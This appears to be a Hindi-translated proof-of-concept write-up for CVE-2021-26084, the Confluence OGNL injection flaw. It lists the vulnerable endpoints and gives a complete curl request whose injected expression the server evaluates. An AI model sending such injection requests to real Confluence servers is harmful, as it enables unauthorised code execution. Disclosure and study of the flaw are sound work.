
CVE-2021-26084 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन को प्रदर्शित करता है।
एक OGNL इंजेक्शन भेद्यता मौजूद है जो एक प्रमाणित उपयोगकर्ता, और कुछ मामलों में अप्रमाणित उपयोगकर्ता को, Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देगी।

प्रवेश बिंदुओं और इंजेक्शनों का पता लगाने की मेरी लड़ाई XD
| लड़ाई (1) | लड़ाई (2) |
|---|---|
![]() |
![]() |
अंततः Confluence प्रवेश बिंदुओं का शोषण किया गया
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
मेरा पहला मैन्युअल निरीक्षण: नोट: पूर्व-प्रमाणित उपयोगकर्ता
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
सर्वर प्रतिक्रिया:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
अद्भुत राइटअप यहाँ पोस्ट किया गया:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
कुछ बहुत उपयोगी संकेत द्वारा:
@wvuuuuuuuuuuuuu
@iamnoooob
Alex Hernandez उर्फ (@_alt3kx_)